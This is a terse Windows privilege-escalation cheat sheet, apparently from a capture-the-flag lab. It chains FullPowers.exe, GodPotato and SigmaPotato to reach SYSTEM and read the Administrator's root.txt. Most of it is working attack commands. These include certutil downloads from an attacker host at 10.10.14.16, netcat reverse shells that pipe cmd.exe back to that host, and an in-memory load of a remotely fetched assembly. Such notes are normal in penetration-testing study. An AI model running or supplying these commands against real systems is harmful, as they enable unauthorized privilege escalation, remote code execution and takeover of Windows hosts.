# https://itm4n.github.io/localservice-privileges/# With this tool, we can abuse a schedule task function to get the all default privilege back including the SeImpersonatePrivilege.
CMD> FullPowers.exeCMD> whoami/priv# Got Potato# https://github.com/BeichenDream/GodPotatoCMD> certutil-urlcache-split-fhttp://10.10.14.16/GodPotato-NET4.exeCMD> GodPotato-NET4.exe-cmd"cmd /c whoami"CMD> GodPotato-NET4.exe-cmd"cmd /c type C:\Users\Administrator\Desktop\root.txt"CMD> certutil-urlcache-split-fhttp://10.10.14.16/nc.exeKali> rlwrapnc-nlvp1235CMD> GodPotato-NET4.exe-cmd"nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.16 1235"# SigmaPotato# https://github.com/tylerdotrar/SigmaPotatoCMD> powershell[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://10.10.14.16/SigmaPotato.exe"))
Kali> rlwrapnc-nlvp1236CMD> [SigmaPotato]::Main(@("--revshell","10.10.14.16","1236"))